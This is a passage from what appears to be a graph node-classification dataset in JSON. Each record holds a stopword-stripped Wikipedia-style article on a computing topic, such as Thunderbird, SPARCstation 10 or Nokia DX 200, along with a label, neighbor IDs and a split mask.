dedicated end-to-end connection communication achieved transmitting information one direction source destination without verifying readiness state receiver",
    "neighbors": [
      514,
      9218,
      10242,
      1541,
      1030,
      7175,
      3592,
      521,
      9734,
      11269,
      14,
      8211,
      5652,
      5653,
      3094,
      6681,
      6682,
      11292,
      10269,
      10270,
      10271,
      6689,
      10274,
      9251,
      2085,
      10279,
      7208,
      6697,
      10283,
      5166,
      7214,
      8238,
      562,
      1586,
      4660,
      9269,
      9779,
      11321,
      11104,
      3133,
      4158,
      5181,
      6723,
      11332,
      8265,
      4687,
      6735,
      7761,
      1618,
      8796,
      609,
      10852,
      10341,
      614,
      10344,
      10349,
      3695,
      4723,
      2164,
      2679,
      3704,
      4729,
      4219,
      2685,
      6273,
      5251,
      9860,
      4229,
      5254,
      649,
      9868,
      3218,
      4242,
      9365,
      3734,
      9367,
      152,
      5785,
      7320,
      3740,
      10908,
      2206,
      3742,
      7329,
      10914,
      9380,
      9381,
      3750,
      3751,
      3752,
      9383,
      10917,
      3755,
      172,
      1197,
      6318,
      6319,
      7343,
      10924,
      7859,
      692,
      2228,
      9909,
      4793,
      3770,
      7865,
      700,
      4797,
      702,
      7361,
      2242,
      8386,
      708,
      7364,
      710,
      8391,
      8392,
      8905,
      11461,
      11464,
      10444,
      1229,
      6861,
      6351,
      5843,
      9939,
      215,
      1754,
      6364,
      6877,
      10461,
      7391,
      6880,
      3297,
      2786,
      8929,
      7908,
      3813,
      9441,
      2797,
      6894,
      751,
      8432,
      8946,
      755,
      5875,
      10995,
      6904,
      3322,
      4349,
      11006,
      1792,
      2306,
      9987,
      3847,
      2827,
      1297,
      4369,
      5906,
      10005,
      6422,
      11029,
      5402,
      5405,
      9725,
      8998,
      6951,
      8487,
      9511,
      9727,
      4396,
      11566,
      7983,
      7984,
      9007,
      10035,
      10747,
      6456,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      328,
      841,
      10058,
      11591,
      849,
      6993,
      1876,
      11606,
      343,
      2904,
      5978,
      7003,
      5469,
      5470,
      5471,
      5472,
      2913,
      8032,
      3939,
      3428,
      1893,
      10589,
      871,
      8039,
      361,
      11105,
      11112,
      4460,
      3437,
      367,
      6512,
      5492,
      11126,
      7031,
      891,
      6524,
      2430,
      2431,
      11647,
      7554,
      1411,
      6531,
      10115,
      4999,
      6541,
      4495,
      3472,
      3473,
      7569,
      7570,
      7572,
      2971,
      5531,
      10651,
      10144,
      10659,
      933,
      2983,
      6567,
      425,
      2476,
      3503,
      6577,
      2994,
      2996,
      5045,
      5559,
      10171,
      3006,
      7102,
      9670,
      8648,
      10698,
      3019,
      11210,
      2509,
      5071,
      9167,
      3540,
      1495,
      8664,
      9692,
      8669,
      8670,
      9181,
      10210,
      10723,
      9190,
      10727,
      3564,
      4589,
      5102,
      11249,
      4084,
      4085,
      6650,
      6651,
      3580,
      3581,
      5118,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 11414,
    "label": 1,
    "text": "SQL_Server_Notification_Services:sql server notification services sql server notification services platform developed microsoft development deployment notification applications based sql server technology microsoft .net framework notification services offers scalable server engine run notification applications multi-server capability-providing flexibility scalability deploying applications notification services designed ease pain developing deploying notification applications generate personalized timely information subscribers design code test components make robust notification services application-such notification scheduling failure detection retry logic time zone management notification grouping queue management adding notification services software applications daunting task years term notification applications superseded term complex event processing cep idea user defines set rules queries advance push data rules data fit criteria rules action fired example rule may state car speed sensor 100 km/h take photo record otherwise data discarded approach much faster traditional oltp design insert row database constantly polling data see something relevant happened especially suited situations high speed inputs fixed set fairly simple queries may need keep data e.g industries measure voltage current attributes hundreds electric motors conveyor belts 100 times second compare measurement average plant operators alerted sudden change occur sql server notification services one many components comprised microsoft sql server first released microsoft sql server 2000 service pack 2 2003 enhanced release shipped sql server 2005 discontinued removed sql server 2008 although sql server 2005 sp3 allows notification services components run sql server 2008 database engine replaced streaminsight first shipped component sql 2008 r2 streaminsight separate install visible part regular sql server setup programming framework based transact-sql xml provides declarative programming model lends quick prototyping deployment robust notification applications api creating subscription management applications provided plus standard components collecting event data files sql server databases formatting notifications using xslt sending notifications via simple mail transfer protocol smtp writing notifications file standard components meet needs application notification services extendable building custom components using .net family programming languages microsoft visual c .net microsoft visual basic .net finally notification services communicate wide variety microsoft third-party custom-built event providers delivery protocols enabling notification services communicate existing systems heterogeneous environments",
    "neighbors": [
      5647,
      10900,
      10902,
      11030,
      3224,
      5401,
      7064,
      4384,
      8227,
      11683,
      11559,
      4010,
      10157,
      9263,
      11570,
      6709,
      8246,
      9909,
      315,
      7486,
      4674,
      1347,
      1348,
      5320,
      4174,
      847,
      83,
      1366,
      9434,
      603,
      479,
      608,
      2401,
      8161,
      7523,
      3303,
      11498,
      3821,
      10991,
      3573,
      502,
      9205,
      5754,
      2943
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11415,
    "label": 7,
    "text": "Soluto:soluto soluto device protection service offered identically named company integrates mobile app web portal proactive communications remote device management one service part premium service soluto enabled users contact premier support technicians soluto offered access via web part soluto pc management platform soluto founded 2008 received 1.6m seed funding proxima ventures followed-up 6.2 million second round financing led bessemer venture partners joined giza venture capital march 2009 2013 soluto acquired asurion llc soluto ceased operation soluto pc management platform april 1 2016 soluto funded index ventures bessemer venture partners giza venture capital proxima ventures crunchfund innovation endeavors initial capital angel investors including chris dixon yuval neeman saar gillai nadav zohar soluto purchased asurion november 12 2013 reported 130 million soluto techcrunch disrupt 2010 soluto named one 2010 alwayson global top private companies lifehacker named soluto one popular free windows downloads 2010 original soluto features listed soluto dashboard 6 sections divided categories technical information user see remote actions user initiate soluto uses downloaded agent transmit data receive data soluto back-end servers data transmitted soluto includes apps running boot enabled browser toolbars add-ons hardware specs specialized form crash reports servers send back agent information solutions recent crashes remote actions initiated user need occur",
    "neighbors": [
      2811,
      2213
    ],
    "mask": "Train"
  },
  {
    "node_id": 11416,
    "label": 2,
    "text": "Job_stream:job stream non-interactive computer system particularly ibm mainframes job stream jobstream simply job sequence job control language statements jcl data called instream data comprise single unit work operating system term job traditionally means one-off piece work contrasted batch executing steps many inputs non-interactive computation come called batch processing thus unit batch processing often called job oxymoronic term batch job see job details performing job consists executing one programs program execution called job step jobstep step usually related way others job steps job executed sequentially possibly depending results previous steps particularly batch processing term job stream particularly associated mainframes ibm z/os operating system job initiated codice_1 terminated next codice_1 codice_3 statement job step consists one codice_4 statement indicating program executed usually multiple codice_5 statements defining files devices used simple example job stream system print payroll checks might consist following steps performed batch inputs step depends successful completion previous step example incorrect data input first step job might terminate without executing subsequent steps allow payroll department correct data rerun edit errors job run completion manual intervention",
    "neighbors": [
      2432,
      5936,
      437,
      2168,
      3323,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 11417,
    "label": 3,
    "text": "LGA_1156:lga 1156 lga 1156 also known socket h h1 intel desktop cpu socket lga stands land grid array incompatible successor lga 1155 last processors supporting ceased production 2011 lga 1156 along lga 1366 designed replace lga 775 whereas lga 775 processors connect northbridge using front side bus lga 1156 processors integrate features traditionally located northbridge within processor lga 1156 socket allows following connections made processor rest system lga 1156 lga 1366 sockets processors discontinued sometime 2012 superseded lga 1155 lga 2011 respectively lga 1156 4 holes fastening heatsink motherboard placed square lateral length 75 mm configuration retained later lga 1155 lga 1150 lga 1151 sockets meaning cooling solutions generally interchangeable lga 1156 processors motherboards made date interoperable making possible switch celeron pentium core i3 core i5 integrated graphics core i5 core i7 without graphics however using chip integrated graphics p55 motherboard addition likely requiring bios update allow use on-board graphics processor likewise using chip without integrated graphics h55 h57 q57 motherboard allow use motherboard graphics ports desktop chipsets support lga 1156 intel h55 h57 p55 q57 server chipsets supporting socket intel 3400 3420 3450",
    "neighbors": [
      3588,
      3973,
      5901,
      5523,
      2455,
      3992,
      8855,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      8625,
      9649,
      4537,
      7105,
      6339,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      10715,
      11484,
      9057,
      9570,
      8035,
      10468,
      613,
      8552,
      1260,
      4717,
      4334,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 11418,
    "label": 5,
    "text": "Mozilla_Thunderbird:mozilla thunderbird mozilla thunderbird free open-source cross-platform email client news client rss chat client developed mozilla foundation project strategy modeled mozilla firefox web browser installed default ubuntu desktop systems december 7 2004 version 1.0 released received 500,000 downloads first three days release 1,000,000 10 days july 6 2012 mozilla announced company dropping priority thunderbird development continuous effort extend thunderbird feature set mostly fruitless new development model shifted mozilla offering extended support releases deliver security maintenance updates allowing community take development new features december 1 2015 mozilla executive chair mitchell baker announced company-wide memo thunderbird development needs uncoupled firefox referred thunderbird developers spending large efforts responding changes mozilla technologies firefox paying tax support thunderbird development also said believe thunderbird potential industry-wide impact firefox time announced mozilla foundation provide least temporary legal financial home thunderbird project since memo 2015 mozilla brought thunderbird back in-house announcement may 9 2017 continues support development thunderbird development team also expanded adding several new members undergone overhaul security user-interface thunderbird email newsgroup news feed chat xmpp irc twitter client vanilla version originally personal information manager pim although mozilla lightning extension installed default adds pim functionality additional features needed often available via extensions thunderbird manage multiple email newsgroup news feed accounts supports multiple identities within accounts features quick search saved search folders virtual folders advanced message filtering message grouping labels help manage find messages linux-based systems system mail movemail accounts supported thunderbird provides basic support system-specific new email notifications extended advanced notification support using add-on thunderbird incorporates bayesian spam filter whitelist based included address book also understand classifications server-based filters spamassassin extensions allow addition features installation xpinstall modules known xpi zippy installation via add-ons website also features update functionality update extensions thunderbird supports variety themes changing overall look feel packages css image files downloaded via add-ons website mozilla add-ons thunderbird follows industry standards email web feeds e.g news aggregators atom rss thunderbird follows internet protocols evolve example ircv3.1 n't support ircv3.2 usenet news groups offer latest nntps see thunderbird provides mailbox format support using plugins feature yet enabled due related work progress mailbox formats supported thunderbird also uses mork since version 3 mozstorage based sqlite internal database mork due replaced mozstorage thunderbird 3.0 8.0 release still uses mork file format current version seamonkey version 2.14.1 also still uses mork indexes pop imap mail folders least since version 38 thunderbird integrated support automatic linking large files instead attaching directly mail message insert menu provides ability include html code thus one insert subscripts degree symbol ° etc. message composed software may limitations number sizes files objects represented example pop3 folders subject filesystem design limitations maximum file sizes filesystems large file support well possible limitations long filenames issues thunderbird runs variety platforms releases available primary distribution site support following operating systems unofficial ports available old ports may available os/2 ecomstation source code freely available compiled run variety architectures operating systems contributors world client translated 50 different languages although email addresses currently limited ascii local parts thunderbird yet support smtputf8 rfc 6531 email address internationalization thunderbird provides enterprise government-grade security features tls/ssl connections imap smtp servers also offers native support s/mime secure email digital signing message encryption using certificates security features take advantage smartcards installation additional extensions security features may added extensions instance enigmail offers pgp signing encryption decryption optional security protections also include disabling loading remote images within messages enabling specific media types sanitizer disabling javascript french military uses thunderbird contributes security features claimed match requirements nato closed messaging system originally launched minotaur shortly phoenix original name mozilla firefox project failed gain momentum success latter however demand increased mail client go work minotaur revived new name thunderbird migrated new toolkit developed firefox team significant work thunderbird restarted announcement version 1.5 onward main mozilla suite would designed around separate applications using new toolkit contrasts previous all-in-one approach allowing users mix match mozilla applications alternatives original mozilla suite continues developed seamonkey december 23 2004 project lightning announced tightly integrated calendar functionality scheduling tasks etc thunderbird lightning support full range calendar mechanisms protocols supported mozilla calendar infrastructure modern post-0.2 sunbird october 11 2006 qualcomm mozilla foundation announced future versions eudora based upon technology platform open source mozilla thunderbird email program project code-named penelope late 2006 debian rebranded thunderbird icedove due trademark copyright reasons second product rebranded july 26 2007 mozilla foundation announced thunderbird would developed independent organization mozilla corporation subsidiary foundation focusing mozilla firefox development september 17 2007 mozilla foundation announced funding new internet communications initiative dr. david ascher activestate purpose initiative develop internet communications software based thunderbird product code brand february 19 2008 mozilla messaging started operations subsidiary mozilla foundation responsible development email similar communications initial focus upcoming version thunderbird 3 alpha preview releases thunderbird 3 codenamed shredder april 4 2011 mozilla messaging merged mozilla labs group mozilla foundation july 6 2012 confidential memo jb piacentino thunderbird managing director mozilla leaked published techcrunch memo indicated mozilla would moving team project development new features would left community memo slated release july 9 2012 subsequent article executive chair mozilla mitchell baker stated mozilla decision make transition thunderbird new release governance model november 25 2014 kent james volunteer-led thunderbird council announced thunderbird blog active contributors thunderbird gathered mozilla office toronto discussed future application decided staff required working full-time thunderbird thunderbird team release stable reliable product make progress features frequently requested community december 1 2015 mitchell baker suggested company-wide memo thunderbird uncoupled firefox infrastructure referred thunderbird tax firefox said believe thunderbird potential industry-wide impact firefox mozilla remains interested role thunderbird seeking assistance help development may 9 2017 philipp kewisch announced mozilla foundation continue serve legal fiscal home thunderbird project thunderbird migrate mozilla corporation infrastructure separating operational aspects project interim/beta versions thunderbird 57 58 released late 2017 began make changes influenced firefox quantum including new photon user interface despite removal firefox quantum support xul-based legacy add-ons favor webextensions stable/esr release thunderbird 60 mid-2018 continued support although require updates support webextensions except themes 2018 according mozilla work underway planned support thunderbird 63 webextensions continue somewhat support legacy addons thunderbird development releases occur three stages called beta earlybird daily correspond firefox beta aurora nightly stages release dates gecko versions exactly firefox example firefox 7 thunderbird 7 released september 27 2011 based gecko 7.0",
    "neighbors": [
      2050,
      10242,
      3590,
      9736,
      2064,
      9744,
      9747,
      2076,
      9757,
      1054,
      546,
      9762,
      8747,
      3629,
      559,
      1075,
      2101,
      2108,
      9281,
      1101,
      3578,
      5205,
      6231,
      7255,
      2139,
      8283,
      6237,
      10851,
      9320,
      6762,
      10860,
      10861,
      4722,
      5749,
      4728,
      637,
      1664,
      2695,
      6791,
      9863,
      4746,
      8331,
      6797,
      4763,
      4272,
      1713,
      9908,
      7861,
      9909,
      11449,
      4294,
      10956,
      8909,
      7888,
      7889,
      10450,
      4310,
      8923,
      10971,
      5343,
      3815,
      9451,
      5357,
      2800,
      9459,
      11000,
      8443,
      9986,
      8455,
      1295,
      7951,
      1297,
      2321,
      2836,
      3350,
      10006,
      1817,
      6431,
      1834,
      7983,
      2864,
      823,
      7488,
      3395,
      4421,
      10057,
      5451,
      2893,
      6489,
      10078,
      8557,
      10606,
      7543,
      7036,
      3969,
      3971,
      3462,
      10631,
      8584,
      3465,
      4490,
      10126,
      2462,
      9121,
      1960,
      5546,
      9642,
      4013,
      8627,
      3508,
      7101,
      5054,
      8640,
      9152,
      3015,
      8147,
      5078,
      3032,
      9693,
      482,
      7139,
      10722,
      5605,
      8169,
      5612,
      6133,
      5114,
      6651,
      2045,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 11419,
    "label": 6,
    "text": "Rational_MultiVersion_File_System:rational multiversion file system computing multiversion file system mvfs virtual file system displays specific versions data stored clearcase particular supports dynamic views show arbitrary combination local remote files",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 11420,
    "label": 2,
    "text": "NeXT_MegaPixel_Display:next megapixel display next megapixel display range crt-based computer monitors manufactured sold next nextcube nextstation workstations designed hartmut esslinger/frog design inc original megapixel display monochrome 17 monitor displaying 4 brightness levels black dark gray light gray white fixed resolution 1120 x 832 92 dpi shy true megapixel 931,840 total pixels 68 hz integrated mono microphone mono speaker stereo rca sockets 3.5mm headphone socket socket keyboard turn provided socket mouse unique feature monitor connected computer single 6 foot cable provided power video signals aforementioned signals severe problem setup monitor could switched completely computer powered screen could switched black cathode heater always remained led extreme screen dimming years use especially computer turned overnight server setup busy software lab problem later rectified ultra rare 4000a model rated 10,000 hours ~14 months display stand allows tilted stand also features two rollers used move monitor back forth despite heavy weight stand also provides place keyboard use freeing real desktop front nextstation color nextdimension board released next sold rebranded color monitors megapixel color display either 17 21 connections provided separate box next soundbox next user reference",
    "neighbors": [
      10406,
      2282,
      7307,
      7806,
      6554,
      7640,
      6234,
      350
    ],
    "mask": "None"
  },
  {
    "node_id": 11421,
    "label": 3,
    "text": "International_Karate:international karate international karate fighting game developed published system 3 various home computers 1985 epyx licensed released game united states world karate championship 1986 international karate successor expanded gameplay released 1987 followed unauthorized release international karate gold 2001 core game two-dimensional one-on-one versus fighting game players take roles martial artists competing kumite tournament rather wearing opponent health goal instead score single solid hits hit combat stops combatants returned starting positions depending well players hit opponent score either half-point full point matches quite brief two full points required win point quickly scored seconds round begins single player mode successive opponents increase difficulty novice white belts master black belts play continues long player continues win matches fights bonus mini-games focusing rhythm timing appear including one player must break number stacked boards using fighter head newer games genre starting specifically street fighter fights take place variety backdrops eight total representing different locations world mount fuji tokyo japan sydney harbour sydney australia statue liberty new york usa forbidden city beijing china christ redeemer rio de janeiro brazil palace westminster london england parthenon athens greece great pyramid giza cairo egypt title utilises standard one-button joystick allowing players execute variety karate techniques unlike modern 2d fighting games players turn around opponent behind must instead execute one three turn-around manoeuvres change direction spectrum version used starting point amstrad cpc port another port exists msx platform version atari st home computer created andromeda software released 1986 version featured advanced graphics versions 16 bit hardware supported colors larger sprites port pc published year used 4-color cga graphics release world karate championship us late april 1986 epyx sued competing video game publisher data east infringement copyright trademark trade dress dispute similarities 1984 arcade game karate champ home computer adaptations published 1985 international karate used coloured fighters points system initial trial district court northern district california began 28 october 1986 decision 28 january 1987 court dismissed allegations trademark trade dress infringement found epyx guilty infringing upon data east usa copyright karate champ data east obtained permanent injunction epyx inc. impoundment restrained epyx sale distribution world karate championship epyx required recall customers distributors copies infringing work decision appealed united states court appeals ninth circuit november 1988 reversed decision stating game similar identical one game company monopolise one entire sport result melbourne house sue system 3 epyx game way exploding fist also similar games though game also borrowed heavily data east karate champ computer gaming world called game original karate champ clone best one available ... great scenery adds ambience 2000 game boy color version created without input archer maclean released international karate 2000 sported enhancements basis international karate advanced released 2001 game boy advance c64 version saw re-releases 2004 title c64 direct-to-tv 2008 wii virtual console",
    "neighbors": [
      6129,
      10931,
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 11422,
    "label": 1,
    "text": "Superbase_(database):superbase database superbase end-user desktop database program started commodore 64 ported various operating systems course 20 years also generally included programming language automate database-oriented tasks later versions included wysiwyg form report designers well sophisticated programming capabilities originally created 1983 precision software commodore 64 128 later amiga atari st 1989 first database management system run windows computer precision software uk-based company original creator product superbase superbase still used large number people various platforms often used end-user database large number applications built throughout industry government academia often significant complexity applications continue use current day mostly small businesses initial versions text mode release amiga version superbase became first product use common vcr control panel browsing records also supported number different media formats including images sounds video superbase often referred multimedia database early years features uncommon amiga version also featured internal language capability generate front end masks queries reports years microsoft access version huge success resulted version created number platforms using approach eventually microsoft windows version released couple years later company sold founders software publishing corporation spc sold non-windows versions product releasing version 2 late alpha stages version 3 sold product company called computer concepts corporation relatively unknown company created subsidiary called superbase inc. finishing late stage alpha version 3 launching superbase 95 eventually appeared lost interest product point bought small group former customers brought back uk company suderbase developers plc continued extend support product superbase classic.the amiga version sold mr. hardware computers joe rothman developed renamed program sbase pro 4 mr hardware computers sbase pro 4 sold russ norrby put version 1.36n newest version new next-generation rewrite product initially called superbase next generation sbng included new object oriented programming language called simpol begun 1999-2000 primarily alpha product although billed beta release 2005 promises true release would around corner 2006 simpol sold realbasics ltd later renamed simpol ltd www.simpol.com april 2009 company launched simpol professional next generation product cross-platform language database tool set february 2009 announced superbase developers plc liquidation march 2010 papatuo holdings ltd. purchased superbase family products official receivers superbase developers plc 2015 papatuo holdings company purchased superbase intellectual property superbase developers plc liquidated also purchased simpol intellectual property upon liquidation simpol limited following versions 1.83 2.06 version 2.10 released july 2017 superbase used basic end-user tasks real strength lies ability relatively untrained programmers create complex applications typically built time need arises types applications run gamut accounting systems erp/mrp packages business information systems production control systems similar complex products basic membership list contact management systems contains high-speed versatile isam database engine powerful dialect basic well sophisticated forms report engines also includes powerful support acting front-end one sql databases biggest drawback fact written 16-bit windows api easily portable 32-bit version rewritten version intended cure make package even easier use powerful casual programmer perspective fact database based sql significant advantage since level complexity far less easier user grasp concepts manage traverse database numerous powerful features product ahoy 1984 stated superbase numerous advanced features seldom seen database manager c-64 including database programming language concluded anyone planning harnessing c-64 office business environment ca n't go wrong superbase",
    "neighbors": [
      7523,
      8262,
      7849,
      8393,
      5612,
      6797,
      10413,
      7983,
      2901,
      10389
    ],
    "mask": "Test"
  },
  {
    "node_id": 11423,
    "label": 2,
    "text": "Nokia_DX_200:nokia dx 200 dx 200 digital switching platform currently developed nokia networks dx 200 versatile fault-tolerant modular highly scalable telephone exchange general purpose server platform designed high performance high availability applications hardware built loosely coupled redundant computer units backed distributed software architecture architecture dx 200 allows live migration well software update live operation unlike many switching platforms dx 200 performs live software update without code patching therefore running code polluted unnecessary jump instructions furthermore opposed integration guessing various software patches dx 200 architecture makes proper integration testing software components possible live software update requires two computer units one executing old code working new software loaded otherwise idle spare process called warming memory areas e.g dynamically allocated memory exception stack procedures moved old new computer unit implies handling data structures must compatible old new software versions copying data require programming effort long allocation data done using tnsdl language developing software dx 200 platform rather straightforward well educated software developer tnsdl language plays vital role producing asynchronously communicating fault-tolerant software modules easy learn software architecture dx 200 fine combination highly efficient traditional solutions well modern actor model based highly concurrent design dx 200 products famous availability exceeding 99.999 five nines well unrivaled performance dx 200 generic architecture suitable versatile computing applications applications include traditional mobile switching centers msc lte mobile packet switching gateways well voip application servers generic operating system ported dx 200 relatively easily linux chorusos dmx frequent operating systems used dx 200 dmx 'native os dx 200 dmx microkernel architecture advanced functions like tcp/ip stack live migration components implemented separate libraries dx 200 several hardware flavors nokia networks shifted focus hardware products software services highly valuable business logic kept products used running dx 200 hardware variants available cloud solutions working generic multi-purpose hardware various vendors development system started televa finnish state owned telecom equipment producer early 1970s leadership keijo olkkola first order received 1973 100 subscriber local exchange small remote island community houtskär delivered 1979 first installation 1982 dx 200 captured 50 share finnish fixed line exchange market exchange modular design development microprocessors technology enabled gradual increase system capacity 1987 installation base grown 400,000 subscriber lines early export markets included china nepal united arab emirates sri lanka sweden turkey soviet union 1984 development version exchange nordic mobile telephone network started 1991 world first gsm call made using nokia devices core network components based dx 200 platform 2005 dx 200 based voip server provided finnish operator saunalahti providing state art fixed-mobile convergence solution prime example well dx 200 suitable internet server development overall flexibility whole dx 200 platform 2009 world ’ first voice calls lte networks using commercial 3gpp-standardized user network equipment 2013 nsn showed truly operational telco cloud solution actually marks end traditional dx200 hardware product line",
    "neighbors": [
      4194,
      6153,
      6281,
      435,
      7187,
      823,
      7802,
      8439
    ],
    "mask": "Train"
  },
  {
    "node_id": 11424,
    "label": 2,
    "text": "OProfile:oprofile computing oprofile system-wide statistical profiling tool linux john levon wrote 2001 linux kernel version 2.4 m.sc project consists kernel module user-space daemon several user-space tools oprofile profile entire system parts interrupt routines drivers user-space processes low overhead widely supported kernel mode oprofile uses system timer see gathering profiling events however mode unable measure kernel functions interrupts disabled newer cpu models support hardware performance counter mode uses hardware logic record events without active code needed linux 2.2/2.4 32-bit x86 ia64 supported linux 2.6 wider support x86 32 64 bit dec alpha mips arm sparc64 ppc64 avr32 call graphs supported x86 arm 2012 two ibm engineers recognized oprofile one two commonly used performance counter monitor profiling tools linux alongside perf tool example",
    "neighbors": [
      10016,
      7234,
      9637,
      3142,
      4423,
      5612,
      823,
      9964,
      7983,
      1459,
      499,
      2517,
      1399,
      3547,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 11425,
    "label": 0,
    "text": "Attempto_Controlled_English:attempto controlled english attempto controlled english ace controlled natural language i.e subset standard english restricted syntax restricted semantics described small set construction interpretation rules development university zurich since 1995 2013 ace version 6.7 announced ace serve knowledge representation specification query language intended professionals want use formal notations formal methods may familiar though ace appears perfectly natural – read understood speaker english – fact formal language ace related tools used fields software specifications theorem proving text summaries ontologies rules querying medical documentation planning simple examples ace construction rules require noun introduced determiner every least 5 ... ace interpretation rules decide 1 interpreted universally quantified 2 interpreted existentially quantified sentences like women human follow ace syntax consequently valid interpretation rules resolve anaphoric references 3 tie second sentence refer new tie first sentence man second sentence refer man first sentence thus ace text coherent entity anaphorically linked sentences attempto parsing engine ape translates ace texts unambiguously discourse representation structures drs use variant language first-order logic drs translated formal languages instance acerules various semantics owl swrl translating ace text fragment first-order logic allows users reason text instance verify validate query overview current version 6.6 ace section vocabulary ace comprises grammar ace defines constrains form meaning ace sentences texts ace grammar expressed set construction rules meaning sentences described small set interpretation rules troubleshooting guide describes use ace avoid pitfalls ace text sequence declarative sentences anaphorically interrelated furthermore ace supports questions commands simple sentence asserts something case — fact event state simple ace sentences following general structure every sentence subject verb complements direct indirect objects necessary transitive verbs insert something ditransitive verbs give something somebody whereas adjuncts adverbs prepositional phrases optional elements simple sentence elaborated upon describe situation detail specify nouns customer card could add adjectives possessive nouns -prepositional phrases variables appositions modifications nouns possible relative sentences described since make sentence composite also detail insertion event e.g adding adverb equivalently adding prepositional phrases combine elaborations arrive composite sentences recursively built simpler sentences coordination subordination quantification negation note ace composite sentences overlap linguists call compound sentences complex sentences coordination possible sentences phrases syntactic type note coordination noun phrases card code represents plural object coordination possible sentences verb phrases relative clauses coordination governed standard binding order logic i.e binds stronger commas used override standard binding order thus sentence means customer inserts visacard code alternatively mastercard code four constructs subordination relative sentences if-then sentences modality sentence subordination relative sentences starting allow add detail nouns help if-then sentences specify conditional hypothetical situations note anaphoric reference via pronoun -part noun phrase card -part modality allows us express possibility necessity sentence subordination comes various forms quantification allows us speak objects certain class universal quantification denote explicitly existence least one object class existential quantification textual occurrence universal existential quantifier opens scope extends end sentence coordinations end respective coordinated sentence express involved customers insert cards write sentence means customer inserts card may may one inserted another customer specify customers insert card — however unrealistic situation seems — write equivalently state every card inserted customer write somewhat indirectly negation allows us express something case negate something objects certain class one uses negate complete statement one uses sentence negation forms negation logical negations i.e state something provably case negation failure states state affairs proved i.e information whether state affairs case ace supports two forms queries yes/no -queries wh -queries yes/no -queries ask existence non-existence specified situation specified ask get positive answer note interrogative sentences always end question mark help wh -queries i.e queries query words interrogate text details specified situation specified ask element sentence exception verb queries also constructed sequence declarative sentences followed one interrogative sentence example ace also supports commands examples command always consists noun phrase addressee followed comma followed uncoordinated verb phrase furthermore command end exclamation mark constrain ambiguity full natural language ace employs three simple means natural language relative sentences combined coordinations introduce ambiguity ace sentence unequivocal meaning customer opens account reflected paraphrase express alternative — though realistic — meaning card opens account relative pronoun must repeated thus yielding coordination relative sentences sentence unambiguously equivalent meaning paraphrase ambiguities safely removed ace without rendering artificial deterministically interpret otherwise syntactically correct ace sentences use small set interpretation rules example write code attaches verb inserts card however probably meant say express code associated card employ interpretation rule relative sentence always modifies immediately preceding noun phrase rephrase input yielding paraphrase — specify customer inserts card code — usually ace texts consist one sentence express occurrences card code mean card code ace provides anaphoric references via definite article processing ace text anaphoric references replaced recent specific accessible noun phrase agrees gender number example recent specific suppose ace parser given sentence refers second card refers first card noun phrases within if-then sentences universally quantified sentences negations modality subordinated sentences referred anaphorically subsequent sentences i.e noun phrases accessible following text thus sentences refer card anaphoric references also possible via personal pronouns via variables anaphoric references via definite articles variables combined note proper names like simplemat always refer object",
    "neighbors": [
      8627,
      523,
      5197,
      987
    ],
    "mask": "Train"
  },
  {
    "node_id": 11426,
    "label": 3,
    "text": "SPARCstation_10:sparcstation 10 sparcstation 10 codenamed campus-2 workstation computer made sun microsystems announced may 1992 sun first desktop multiprocessor housed pizza box form factor case later replaced sparcstation 20 40 mhz sparcstation 10 without external cache reference spec cpu95 benchmark sparcstation 10 ss10 contains two mbus slots running either 36 mhz 33 mhz earliest models 40 mhz set via motherboard jumper mbus slot contain single dual sparc cpu modules permitting expansion four cpus supersparc hypersparc cpu modules available single supersparc modules without external cache sold sun ran clock speed mbus uniprocessor models 20 30 40 dual processor model 402 single dual supersparc modules 1 mb external cache also sold independently clocked ran higher rate mbus commonly 40.3 mhz 50 mhz uniprocessor models 41 51 multiprocessor models 412 512 514 sun dual 50 mhz supersparc modules dual mbus modules supported sun system double-width physically occupying one sbus slot per module addition mbus slot supersparc modules without external cache could mixed supersparc modules external cache could mixed even different clock speeds sun-supported configuration ross hypersparc modules also available third party vendors ss10 reasonable cooling capacity given cramped pizzabox case designed higher-speed hypersparc modules heat issues common modules used particularly four cpu configurations ss10 hold maximum 512 mb ram eight slots ss10 enclosure hold two 50-pin scsi hard drives floppy disk drive scsi devices attached via external scsi port ata disk support one onboard ethernet interface accessed built-in 10base-t jack via special 26-pin port provides aui audio connections one network ports active time special cable adapter needed convert latter port standard da-15 connector also two basic rate interface bri isdn connectors system shipped plastic blocking plugs inserted connectors additional sbus network cards also added sparcstation 10 systems lack integrated graphics referred sparcstation 10sx include sx cg14 framebuffer used sparcstation 20 requiring 4mb 8mb vsimm operate sparcstation 10s seem vsimm slots cutout case solder pads sx 13w3 connector options include cg6 gx gx+ turbo gx tgx+ 8-bit sbus 